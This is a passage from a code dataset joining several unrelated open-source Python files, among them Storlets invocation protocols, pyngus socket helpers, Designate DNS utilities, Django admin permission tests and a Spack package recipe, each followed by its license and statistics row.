# Best we can do is execute the container.
self.logger.debug('Failed to check Storlet daemon status, restart Docker container')
res = self.restart()
if (res != 1):
raise Exception('Docker container is not responsive')
storlet_daemon_status = 0
if (cache_updated == True and storlet_daemon_status == 1):
# The cache was updated while the daemon is running we need to stop it.
self.logger.debug('The cache was updated, and the storlet daemon is running. Stopping daemon')
res = self.stop_storlet_daemon( invocation_data['storlet_main_class'] )
if res != 1:
res = self.restart()
if (res != 1):
raise Exception('Docker container is not responsive')
else:
self.logger.debug('Deamon stopped')
storlet_daemon_status = 0
if (storlet_daemon_status == 0):
self.logger.debug('Going to start storlet daemon!')
class_path = '/home/swift/%s/%s' % (invocation_data['storlet_main_class'],
invocation_data['storlet_name'])
for dep in invocation_data['storlet_dependency'].split(','):
class_path = '%s:/home/swift/%s/%s' %\
(class_path,
invocation_data['storlet_main_class'],
dep)
daemon_status = self.start_storlet_daemon(
class_path,
invocation_data['storlet_main_class'])
if daemon_status != 1:
self.logger.error('Daemon start Failed, returned code is %d' % daemon_status)
raise Exception('Daemon start failed')
else:
self.logger.debug('Daemon started')
'''---------------------------------------------------------------------------
Storlet Daemon API
The StorletInvocationGETProtocol, StorletInvocationPUTProtocol, StorletInvocationSLOProtocol
server as an API between the Docker Gateway and the Storlet Daemon which
runs inside the Docker container. These classes implement the Storlet execution
protocol
---------------------------------------------------------------------------'''
class StorletInvocationProtocol():
def _add_input_stream(self, appendFd):
#self.fds.append(self.srequest.stream
self.fds.append(appendFd)
# TODO: Break request metadata and systemmetadata
md = dict()
md['type'] = SBUS_FD_INPUT_OBJECT
if self.srequest.user_metadata is not None:
for key, val in self.srequest.user_metadata.iteritems():
md[key] = val
self.fdmd.append(md)
def _add_output_stream(self):
self.fds.append(self.execution_str_write_fd)
md = dict()
md['type'] = SBUS_FD_OUTPUT_TASK_ID
self.fdmd.append(md)
self.fds.append(self.data_write_fd)
md = dict()
md['type'] = SBUS_FD_OUTPUT_OBJECT
self.fdmd.append(md)
self.fds.append(self.metadata_write_fd)
md = dict()
md['type'] = SBUS_FD_OUTPUT_OBJECT_METADATA
self.fdmd.append(md)
def _add_logger_stream(self):
self.fds.append(self.storlet_logger.getfd())
md = dict()
md['type'] = SBUS_FD_LOGGER
self.fdmd.append(md)
def _prepare_invocation_descriptors(self):
# Add the input stream
self._add_input_stream()
# Add the output stream
self.data_read_fd, self.data_write_fd = os.pipe()
self.execution_str_read_fd, self.execution_str_write_fd = os.pipe()
self.metadata_read_fd, self.metadata_write_fd = os.pipe()
self._add_output_stream()
# Add the logger
self._add_logger_stream()
def _close_remote_side_descriptors(self):
if self.data_write_fd:
os.close(self.data_write_fd)
if self.metadata_write_fd:
os.close(self.metadata_write_fd)
if self.execution_str_write_fd:
os.close(self.execution_str_write_fd)
def _cancel(self):
read_fd, write_fd = os.pipe()
dtg = SBusDatagram.create_service_datagram( SBUS_CMD_CANCEL, write_fd )
dtg.set_task_id(self.task_id)
rc = SBus.send( self.storlet_pipe_path, dtg )
if (rc < 0):
return -1
reply = os.read(read_fd,10)
os.close(read_fd)
os.close(write_fd)
def _invoke(self):
dtg = SBusDatagram()
dtg.set_files( self.fds )
dtg.set_metadata( self.fdmd )
dtg.set_exec_params( self.srequest.params )
dtg.set_command(SBUS_CMD_EXECUTE)
rc = SBus.send( self.storlet_pipe_path, dtg )
if (rc < 0):
raise Exception("Failed to send execute command")
self._wait_for_read_with_timeout(self.execution_str_read_fd)
self.task_id = os.read(self.execution_str_read_fd, 10)
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
self.srequest = srequest
self.storlet_pipe_path = storlet_pipe_path
self.storlet_logger_path = storlet_logger_path
self.timeout = timeout
# remote side file descriptors and their metadata lists
# to be sent as part of invocation
self.fds = list()
self.fdmd = list()
# local side file descriptors
self.data_read_fd = None
self.data_write_fd = None
self.metadata_read_fd = None
self.metadata_write_fd = None
self.execution_str_read_fd = None
self.execution_str_write_fd = None
self.task_id = None
if not os.path.exists(storlet_logger_path):
os.makedirs(storlet_logger_path)
def _wait_for_read_with_timeout(self, fd):
r, w, e = select.select([ fd ], [], [ ], self.timeout)
if len(r) == 0:
if self.task_id:
self._cancel()
raise Timeout('Timeout while waiting for storlet output')
if fd in r:
return
def _read_metadata(self):
self._wait_for_read_with_timeout(self.metadata_read_fd)
flat_json = os.read(self.metadata_read_fd, MAX_META_OVERALL_SIZE)
if flat_json is not None:
md = json.loads(flat_json)
return md
class StorletInvocationGETProtocol(StorletInvocationProtocol):
def _add_input_stream(self):
StorletInvocationProtocol._add_input_stream(self, self.srequest.stream)
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
def communicate(self):
self.storlet_logger = StorletLogger(self.storlet_logger_path, 'storlet_invoke')
self.storlet_logger.open()
self._prepare_invocation_descriptors()
try:
self._invoke()
except Exception as e:
raise e
finally:
self._close_remote_side_descriptors()
self.storlet_logger.close()
out_md = self._read_metadata()
os.close(self.metadata_read_fd)
self._wait_for_read_with_timeout(self.data_read_fd)
os.close(self.execution_str_read_fd)
return out_md, self.data_read_fd
class StorletInvocationProxyProtocol(StorletInvocationProtocol):
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
self.input_data_read_fd, self.input_data_write_fd = os.pipe()
# YM this pipe permits to take data from srequest.stream to input_data_write_fd
# YM the write side stays with us, the read side is sent to storlet
def _add_input_stream(self):
StorletInvocationProtocol._add_input_stream(self, self.input_data_read_fd)
def _wait_for_write_with_timeout(self,fd):
r, w, e = select.select([ ], [ fd ], [ ], self.timeout)
if len(w) == 0:
raise Timeout('Timeout while waiting for storlet to read')
if fd in w:
return
def _write_with_timeout(self, writer, chunk):
timeout = Timeout(self.timeout)
try:
writer.write(chunk)
except Timeout as t:
if t is timeout:
writer.close()
raise t
except Exception as e:
raise e
finally:
timeout.cancel()
def communicate(self):
self.storlet_logger = StorletLogger(self.storlet_logger_path, 'storlet_invoke')
self.storlet_logger.open()
self._prepare_invocation_descriptors()
try:
self._invoke()
except Exception as e:
raise e
finally:
self._close_remote_side_descriptors()
self.storlet_logger.close()
self._wait_for_write_with_timeout(self.input_data_write_fd)
# We do the writing in a different thread.
# Otherwise, we can run into the following deadlock
# 1. middleware writes to Storlet
# 2. Storlet reads and starts to write metadata and then data
# 3. middleware continues writing
# 4. Storlet continues writing and gets stuck as middleware
# is busy writing, but still not consuming the reader end
# of the Storlet writer.
eventlet.spawn_n(self._write_input_data)
out_md = self._read_metadata()
self._wait_for_read_with_timeout(self.data_read_fd)
return out_md, self.data_read_fd
class StorletInvocationPUTProtocol(StorletInvocationProxyProtocol):
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProxyProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
def _write_input_data(self):
writer = os.fdopen(self.input_data_write_fd, 'w')
reader = self.srequest.stream
for chunk in iter(lambda: reader(65536), ''):
self._write_with_timeout(writer, chunk)
writer.close()
class StorletInvocationSLOProtocol(StorletInvocationProxyProtocol):
def __init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout):
StorletInvocationProxyProtocol.__init__(self, srequest, storlet_pipe_path, storlet_logger_path, timeout)
def _write_input_data(self):
writer = os.fdopen(self.input_data_write_fd, 'w')
reader = self.srequest.stream
# print >> sys.stdout, ' type of reader %s'% (type(reader))
for chunk in reader:
self._write_with_timeout(writer, chunk)
# print >> sys.stderr, 'next SLO chunk...%d'% len(chunk)
writer.close()
|
apache-2.0
| 412,615,498,885,021,600 | 37.305031 | 112 | 0.578729 | false |
irinabov/debian-pyngus
|
pyngus/sockets.py
|
1
|
4044
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""helper methods that provide boilerplate socket I/O and Connection
processing.
"""
__all__ = [
"read_socket_input",
"write_socket_output"
]
import errno
import logging
import socket
from pyngus.connection import Connection
LOG = logging.getLogger(__name__)
def read_socket_input(connection, socket_obj):
"""Read from the network layer and processes all data read. Can
support both blocking and non-blocking sockets.
Returns the number of input bytes processed, or EOS if input processing
is done. Any exceptions raised by the socket are re-raised.
"""
count = connection.needs_input
if count <= 0:
return count # 0 or EOS
while True:
try:
sock_data = socket_obj.recv(count)
break
except socket.timeout as e:
LOG.debug("Socket timeout exception %s", str(e))
raise # caller must handle
except socket.error as e:
LOG.debug("Socket error exception %s", str(e))
err = e.errno
if err in [errno.EAGAIN,
errno.EWOULDBLOCK,
errno.EINTR]:
# try again later
return 0
# otherwise, unrecoverable, caller must handle
raise
except Exception as e: # beats me... assume fatal
LOG.debug("unknown socket exception %s", str(e))
raise # caller must handle
if len(sock_data) > 0:
count = connection.process_input(sock_data)
else:
LOG.debug("Socket closed")
count = Connection.EOS
connection.close_input()
connection.close_output()
LOG.debug("Socket recv %s bytes", count)
return count
def write_socket_output(connection, socket_obj):
"""Write data to the network layer. Can support both blocking and
non-blocking sockets.
Returns the number of output bytes sent, or EOS if output processing
is done. Any exceptions raised by the socket are re-raised.
"""
count = connection.has_output
if count <= 0:
return count # 0 or EOS
data = connection.output_data()
if not data:
# error - has_output > 0, but no data?
return Connection.EOS
while True:
try:
count = socket_obj.send(data)
break
except socket.timeout as e:
LOG.debug("Socket timeout exception %s", str(e))
raise # caller must handle
except socket.error as e:
LOG.debug("Socket error exception %s", str(e))
err = e.errno
if err in [errno.EAGAIN,
errno.EWOULDBLOCK,
errno.EINTR]:
# try again later
return 0
# else assume fatal let caller handle it:
raise
except Exception as e: # beats me... assume fatal
LOG.debug("unknown socket exception %s", str(e))
raise
if count > 0:
LOG.debug("Socket sent %s bytes", count)
connection.output_written(count)
elif data:
LOG.debug("Socket closed")
count = Connection.EOS
connection.close_output()
connection.close_input()
return count
|
apache-2.0
| -6,626,798,108,324,280,000 | 32.421488 | 78 | 0.612018 | false |
grahamhayes/designate
|
designate/dnsutils.py
|
1
|
11985
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Author: Endre Karlson <endre.karlson@hpe.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import socket
import base64
import time
from threading import Lock
import six
import dns
import dns.exception
import dns.zone
import eventlet
from dns import rdatatype
from oslo_log import log as logging
from oslo_config import cfg
from designate import context
from designate import exceptions
from designate import objects
from designate.i18n import _LE
from designate.i18n import _LI
LOG = logging.getLogger(__name__)
util_opts = [
cfg.IntOpt('xfr_timeout', help="Timeout in seconds for XFR's.", default=10)
]
class DNSMiddleware(object):
"""Base DNS Middleware class with some utility methods"""
def __init__(self, application):
self.application = application
def process_request(self, request):
"""Called on each request.
If this returns None, the next application down the stack will be
executed. If it returns a response then that response will be returned
and execution will stop here.
"""
return None
def process_response(self, response):
"""Do whatever you'd like to the response."""
return response
def __call__(self, request):
response = self.process_request(request)
if response:
return response
response = self.application(request)
return self.process_response(response)
def _build_error_response(self):
response = dns.message.make_response(
dns.message.make_query('unknown', dns.rdatatype.A))
response.set_rcode(dns.rcode.FORMERR)
return response
class SerializationMiddleware(DNSMiddleware):
"""DNS Middleware to serialize/deserialize DNS Packets"""
def __init__(self, application, tsig_keyring=None):
self.application = application
self.tsig_keyring = tsig_keyring
def __call__(self, request):
# Generate the initial context. This may be updated by other middleware
# as we learn more information about the Request.
ctxt = context.DesignateContext.get_admin_context(all_tenants=True)
try:
message = dns.message.from_wire(request['payload'],
self.tsig_keyring)
if message.had_tsig:
LOG.debug('Request signed with TSIG key: %s', message.keyname)
# Create + Attach the initial "environ" dict. This is similar to
# the environ dict used in typical WSGI middleware.
message.environ = {
'context': ctxt,
'addr': request['addr'],
}
except dns.message.UnknownTSIGKey:
LOG.error(_LE("Unknown TSIG key from %(host)s:"
"%(port)d") % {'host': request['addr'][0],
'port': request['addr'][1]})
response = self._build_error_response()
except dns.tsig.BadSignature:
LOG.error(_LE("Invalid TSIG signature from %(host)s:"
"%(port)d") % {'host': request['addr'][0],
'port': request['addr'][1]})
response = self._build_error_response()
except dns.exception.DNSException:
LOG.error(_LE("Failed to deserialize packet from %(host)s:"
"%(port)d") % {'host': request['addr'][0],
'port': request['addr'][1]})
response = self._build_error_response()
except Exception:
LOG.exception(_LE("Unknown exception deserializing packet "
"from %(host)s %(port)d") %
{'host': request['addr'][0],
'port': request['addr'][1]})
response = self._build_error_response()
else:
# Hand the Deserialized packet onto the Application
for response in self.application(message):
# Serialize and return the response if present
if isinstance(response, dns.message.Message):
yield response.to_wire(max_size=65535)
elif isinstance(response, dns.renderer.Renderer):
yield response.get_wire()
class TsigInfoMiddleware(DNSMiddleware):
"""Middleware which looks up the information available for a TsigKey"""
def __init__(self, application, storage):
super(TsigInfoMiddleware, self).__init__(application)
self.storage = storage
def process_request(self, request):
if not request.had_tsig:
return None
try:
criterion = {'name': request.keyname.to_text(True)}
tsigkey = self.storage.find_tsigkey(
context.get_current(), criterion)
request.environ['tsigkey'] = tsigkey
request.environ['context'].tsigkey_id = tsigkey.id
except exceptions.TsigKeyNotFound:
# This should never happen, as we just validated the key.. Except
# for race conditions..
return self._build_error_response()
return None
class TsigKeyring(object):
"""Implements the DNSPython KeyRing API, backed by the Designate DB"""
def __init__(self, storage):
self.storage = storage
def __getitem__(self, key):
return self.get(key)
def get(self, key, default=None):
try:
criterion = {'name': key.to_text(True)}
tsigkey = self.storage.find_tsigkey(
context.get_current(), criterion)
return base64.decodestring(tsigkey.secret)
except exceptions.TsigKeyNotFound:
return default
class ZoneLock(object):
"""A Lock across all zones that enforces a rate limit on NOTIFYs"""
def __init__(self, delay):
self.lock = Lock()
self.data = {}
self.delay = delay
def acquire(self, zone):
with self.lock:
# If no one holds the lock for the zone, grant it
if zone not in self.data:
self.data[zone] = time.time()
return True
# Otherwise, get the time that it was locked
locktime = self.data[zone]
now = time.time()
period = now - locktime
# If it has been locked for longer than the allowed period
# give the lock to the new requester
if period > self.delay:
self.data[zone] = now
return True
LOG.debug('Lock for %(zone)s can\'t be releaesed for %(period)s'
'seconds' % {'zone': zone,
'period': str(self.delay - period)})
# Don't grant the lock for the zone
return False
def release(self, zone):
# Release the lock
with self.lock:
try:
self.data.pop(zone)
except KeyError:
pass
class LimitNotifyMiddleware(DNSMiddleware):
"""Middleware that rate limits NOTIFYs to the Agent"""
def __init__(self, application):
super(LimitNotifyMiddleware, self).__init__(application)
self.delay = cfg.CONF['service:agent'].notify_delay
self.locker = ZoneLock(self.delay)
def process_request(self, request):
opcode = request.opcode()
if opcode != dns.opcode.NOTIFY:
return None
zone_name = request.question[0].name.to_text()
if self.locker.acquire(zone_name):
time.sleep(self.delay)
self.locker.release(zone_name)
return None
else:
LOG.debug('Threw away NOTIFY for %(zone)s, already '
'working on an update.' % {'zone': zone_name})
response = dns.message.make_response(request)
# Provide an authoritative answer
response.flags |= dns.flags.AA
return (response,)
def from_dnspython_zone(dnspython_zone):
# dnspython never builds a zone with more than one SOA, even if we give
# it a zonefile that contains more than one
soa = dnspython_zone.get_rdataset(dnspython_zone.origin, 'SOA')
if soa is None:
raise exceptions.BadRequest('An SOA record is required')
email = soa[0].rname.to_text().rstrip('.')
email = email.replace('.', '@', 1)
values = {
'name': dnspython_zone.origin.to_text(),
'email': email,
'ttl': soa.ttl,
'serial': soa[0].serial,
'retry': soa[0].retry,
'expire': soa[0].expire
}
zone = objects.Zone(**values)
rrsets = dnspyrecords_to_recordsetlist(dnspython_zone.nodes)
zone.recordsets = rrsets
return zone
def dnspyrecords_to_recordsetlist(dnspython_records):
rrsets = objects.RecordList()
for rname in six.iterkeys(dnspython_records):
for rdataset in dnspython_records[rname]:
rrset = dnspythonrecord_to_recordset(rname, rdataset)
if rrset is None:
continue
rrsets.append(rrset)
return rrsets
def dnspythonrecord_to_recordset(rname, rdataset):
record_type = rdatatype.to_text(rdataset.rdtype)
# Create the other recordsets
values = {
'name': rname.to_text(),
'type': record_type
}
if rdataset.ttl != 0:
values['ttl'] = rdataset.ttl
rrset = objects.RecordSet(**values)
rrset.records = objects.RecordList()
for rdata in rdataset:
rr = objects.Record(data=rdata.to_text())
rrset.records.append(rr)
return rrset
def do_axfr(zone_name, servers, timeout=None, source=None):
"""
Performs an AXFR for a given zone name
"""
random.shuffle(servers)
timeout = timeout or cfg.CONF["service:mdns"].xfr_timeout
xfr = None
for srv in servers:
to = eventlet.Timeout(timeout)
log_info = {'name': zone_name, 'host': srv}
try:
LOG.info(_LI("Doing AXFR for %(name)s from %(host)s"), log_info)
xfr = dns.query.xfr(srv['host'], zone_name, relativize=False,
timeout=1, port=srv['port'], source=source)
raw_zone = dns.zone.from_xfr(xfr, relativize=False)
break
except eventlet.Timeout as t:
if t == to:
msg = _LE("AXFR timed out for %(name)s from %(host)s")
LOG.error(msg % log_info)
continue
except dns.exception.FormError:
msg = _LE("Zone %(name)s is not present on %(host)s."
"Trying next server.")
LOG.error(msg % log_info)
except socket.error:
msg = _LE("Connection error when doing AXFR for %(name)s from "
"%(host)s")
LOG.error(msg % log_info)
except Exception:
msg = _LE("Problem doing AXFR %(name)s from %(host)s. "
"Trying next server.")
LOG.exception(msg % log_info)
finally:
to.cancel()
continue
else:
msg = _LE("XFR failed for %(name)s. No servers in %(servers)s was "
"reached.")
raise exceptions.XFRFailure(
msg % {"name": zone_name, "servers": servers})
LOG.debug("AXFR Successful for %s" % raw_zone.origin.to_text())
return raw_zone
|
apache-2.0
| -2,717,896,543,009,347,000 | 31.131367 | 79 | 0.583229 | false |
stevec7/iointegrity
|
contrib/mpi/mpi_create_files.py
|
1
|
3537
|
#!/usr/bin/env python
import datetime
import logging
import os
import sys
from mpi4py import MPI
from optparse import OptionParser
from iointegrity.iotools import create_random_file, FileMD5
from iointegrity.dbtools import IOIntegrityDB
def main(options, args):
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# setup logging
if options.verbose:
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
else:
logging.basicConfig(format='%(message)s', level=logging.INFO)
if rank == 0:
# do the master
master(comm, options)
else:
# secondary stuff
slave(comm, options)
return
def create(options, work):
fmd5 = FileMD5()
results = []
for w in work:
create_random_file(w, options.size)
md5sum = fmd5.create_md5(w)
results.append((w, md5sum))
return results
def master(comm, options):
'''rank 0 will handle the program setup, and distribute
tasks to all of the other ranks'''
num_ranks = comm.Get_size()
filename = "{0}/{1}{2}.dat"
# create a list of files to pass to the ranks
files = [ filename.format(options.dir, options.prefix, n)
for n in range(0, options.numfiles) ]
# if num_ranks is 1, then we exit...
if num_ranks == 1:
print("Need more than 1 rank Ted...")
comm.Abort(1)
# split into chunks since mpi4py's scatter cannot take a size arg
chunks = [[] for _ in range(comm.Get_size())]
for e, chunk in enumerate(files):
chunks[e % comm.Get_size()].append(chunk)
rc = comm.scatter(chunks)
results = create(options, rc)
# get results and add to a database
results = comm.gather(results, root=0)
db = IOIntegrityDB(options.dbfile)
mydate = datetime.datetime.now().isoformat()
to_insert = []
for rank, r in enumerate(results):
logging.debug("Rank: {}, Results: {}".format(rank, r))
for i in r:
to_insert.append((i[0], i[1], '', '', mydate))
db.mass_insert_filemd5(to_insert)
return
def slave(comm, options):
rank = comm.Get_rank()
data = []
results = []
data = comm.scatter(data, root=0)
start_time = MPI.Wtime()
results = create(options, data)
elapsed = MPI.Wtime() - start_time
# these will be committed to a database
results = comm.gather(results, root=0)
return
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-d', '--dir',
dest='dir',
type='str',
help='full path to dir where files will be created.')
parser.add_option('-f', '--dbfile',
dest='dbfile',
type='str',
help='full path to the database file.')
parser.add_option('-n', '--numfiles',
dest='numfiles',
type='int',
help='number of files to create')
parser.add_option('-p', '--prefix',
dest='prefix',
type='str',
help='prefix to add to the beginning of the files')
parser.add_option('-s', '--size',
dest='size',
type='int',
help='file size in bytes')
parser.add_option('-v', '--verbose',
action='store_true',
dest='verbose',
help='show verbose output')
options, args = parser.parse_args()
main(options, args)
|
bsd-3-clause
| 8,793,834,149,230,574,000 | 27.756098 | 73 | 0.559796 | false |
ctxis/django-admin-view-permission
|
tests/tests/helpers.py
|
1
|
4472
|
from __future__ import unicode_literals
from django.conf.urls import url
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import Client, TestCase
from model_mommy import mommy
from model_mommy.recipe import seq
SIMPLE_USERNAME = seq('simple_user_')
SUPER_USERNAME = seq('super_user_')
def create_simple_user(username=None):
if not username:
username = SIMPLE_USERNAME
simple_user = mommy.make(get_user_model(), username=username)
simple_user.set_password('simple_user')
# Django 1.8 compatibility
simple_user.is_staff = True
simple_user.save()
return simple_user
def create_super_user(username=None):
if not username:
username = SUPER_USERNAME
super_user = mommy.make(
get_user_model(),
username=username, is_superuser=True)
super_user.set_password('super_user')
# Django 1.8 compatibility
super_user.is_staff = True
super_user.save()
return super_user
def create_urlconf(admin_site):
return type(
str('Urlconf'),
(object,),
{'urlpatterns': [
url('test_admin/', admin_site.urls)
]}
)
class DataMixin(object):
@classmethod
def setUpTestData(cls):
# Permissions
cls.add_permission_model1 = Permission.objects.get(
name='Can add test model1')
cls.view_permission_model1 = Permission.objects.get(
name='Can view testmodel1')
cls.change_permission_model1 = Permission.objects.get(
name='Can change test model1')
cls.delete_permission_model1 = Permission.objects.get(
name='Can delete test model1')
cls.view_permission_model1parler = Permission.objects.get(
name='Can view testmodelparler'
)
cls.view_permission_model1parlertranslation = Permission.objects.get(
name='Can view testmodelparlertranslation'
)
cls.add_permission_model4 = Permission.objects.get(
name='Can add test model4')
cls.view_permission_model4 = Permission.objects.get(
name='Can view testmodel4')
cls.change_permission_model4 = Permission.objects.get(
name='Can change test model4')
cls.delete_permission_model4 = Permission.objects.get(
name='Can delete test model4')
cls.add_permission_model5 = Permission.objects.get(
name='Can add test model5')
cls.view_permission_model5 = Permission.objects.get(
name='Can view testmodel5')
cls.change_permission_model5 = Permission.objects.get(
name='Can change test model5')
cls.delete_permission_model5 = Permission.objects.get(
name='Can delete test model5')
cls.add_permission_model6 = Permission.objects.get(
name='Can add test model6')
cls.view_permission_model6 = Permission.objects.get(
name='Can view testmodel6')
cls.change_permission_model6 = Permission.objects.get(
name='Can change test model6')
cls.delete_permission_model6 = Permission.objects.get(
name='Can delete test model6')
class AdminViewPermissionViewsTestCase(DataMixin, TestCase):
@classmethod
def setUpTestData(cls):
super(AdminViewPermissionViewsTestCase, cls).setUpTestData()
cls.user_with_v_perm_on_model1 = create_simple_user(
username='user_with_v_perm_on_model1',
)
cls.user_with_v_perm_on_model1.user_permissions.add(
cls.view_permission_model1,
)
cls.user_with_vd_perm_on_moedl1 = create_simple_user(
username='user_with_vd_perm_on_model1',
)
cls.user_with_vd_perm_on_moedl1.user_permissions.add(
cls.view_permission_model1,
cls.delete_permission_model1,
)
cls.user_with_v_perm_on_model1parler = create_simple_user(
username='user_with_v_perm_on_model1parler'
)
cls.user_with_v_perm_on_model1parler.user_permissions.add(
cls.view_permission_model1parler,
)
cls.user_with_v_perm_on_model1parler.user_permissions.add(
cls.view_permission_model1parlertranslation,
)
cls.super_user = create_super_user(username='super_user')
def setUp(self):
self.client = Client()
def tearDown(self):
self.client.logout()
|
bsd-2-clause
| -5,763,516,324,128,774,000 | 31.405797 | 77 | 0.641547 | false |
veselosky/siteqa
|
siteqa/__about__.py
|
1
|
1122
|
# vim: set fileencoding=utf-8 :
#
# Copyright 2017 Vince Veselosky and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
"__author__",
"__author_email__",
"__copyright__",
"__description__",
"__license__",
"__name__",
"__url__",
"__version__",
]
__author__ = "Vince Veselosky"
__author_email__ = "vince@veselosky.com"
__copyright__ = "2017 Vince Veselosky and contributors"
__description__ = "Tools for checking website quality"
__license__ = "Apache 2.0"
__name__ = "siteqa"
__url__ = 'https://github.com/veselosky/siteqa'
__version__ = "0.1.0"
|
apache-2.0
| 1,655,158,620,334,144,500 | 30.166667 | 76 | 0.658645 | false |
ClearCorp/odootools
|
odootools/odootools/install/update.py
|
1
|
2076
|
#!/usr/bin/python2
# -*- coding: utf-8 -*-
########################################################################
#
# Odoo Tools by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLEARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
'''
Description: Updates the odootools installation
WARNING: If you update this file, please remake the installer and
upload it to launchpad.
To make the installer, run this file or call odootools-make
if the odootools are installed.
'''
import os
import logging
from odootools.lib import config, bzr, tools
_logger = logging.getLogger('odootools.install.update')
def update():
_logger.debug('Checking if user is root')
tools.exit_if_not_root('odootools-update')
bzr.bzr_initialize()
if 'odootools_path' in config.params:
odootools_path = config.params['odootools_path']
else:
_logger.error('The Odoo Tools path was not specified. Exiting.')
return False
if not os.path.isdir(odootools_path):
_logger.error('The Odoo Tools path (%s) is not a valid directory. Exiting.' % oerptools_path)
return False
if 'source_repo' in config.params:
bzr.bzr_pull(odootools_path, config.params['source_repo'])
else:
bzr.bzr_pull(odootools_path)
return True
|
agpl-3.0
| -5,720,672,702,035,555,000 | 34.186441 | 101 | 0.63632 | false |
skosukhin/spack
|
var/spack/repos/builtin/packages/r-tiff/package.py
|
1
|
1775
|
##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RTiff(RPackage):
"""This package provides an easy and simple way to read, write and
display bitmap images stored in the TIFF format. It can read and
write both files and in-memory raw vectors."""
homepage = "http://www.rforge.net/tiff/"
url = "https://cran.rstudio.com/src/contrib/tiff_0.1-5.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/tiff"
version('0.1-5', '5052990b8647c77d3e27bc0ecf064e0b')
depends_on("libjpeg")
depends_on("libtiff")
|
lgpl-2.1
| 4,270,702,897,405,814,300 | 43.375 | 78 | 0.673239 | false |
blaiseli/p4-phylogenetics
|
p4/node.py
|
1
|
9111
|
import func
from var import var
import sys
import pf
class NodeBranchPart(object):
def __init__(self):
self.rMatrixNum = -1
self.gdasrvNum = -1
#self.bigP = None
class NodeBranch(object):
def __init__(self):
self.len = 0.1
# self.textDrawSymbol = '-' # See var.modelSymbols for some
# alternative symbols
self.rawSplitKey = None # Odd or even
self.splitKey = None # Only even
#self.name = None
# self.uName = None # under-name
# self.color = None # US spelling.
# self.support = None # A float, so that it can preserve all its significant
# digits, yet can be formatted flexibly for output.
# self.biRootCount = None # For cons trees, where the input trees are
# bi-Rooted, ie have bifurcating roots. This
# is the number of compatible input trees that
# were rooted on this branch.
self.parts = [] # NodeBranchPart() objects
self.lenChanged = False
class NodePart(object):
def __init__(self):
#self.pats = None
#self.nPats = 0
self.compNum = -1
#self.cl = None
#self.cl2 = None
class Node(object):
"""A Node is a vertex in a Tree. All but the root have a branch.
A Node has pointers to its parent, leftChild, and sibling, any of which may be None.
"""
# def __del__(self, freeNode=pf.p4_freeNode, dp_freeNode=pf.dp_freeNode,
# mysys=sys):
def __del__(self, freeNode=pf.p4_freeNode, mysys=sys):
# def __del__(self, freeNode=pf.p4_freeNode, dp_freeNode=pf.dp_freeNode):
# def __del__(self, freeNode=pf.p4_freeNode):
# if self.nodeNum == 0:
#mysys.stdout.write('Node.__del__() deleting node %i\n' % self.nodeNum)
# mysys.stdout.flush()
# Generally, cNodes are deleted before the cTree is freed. freeNode
# requires the cTree!
if self.cNode:
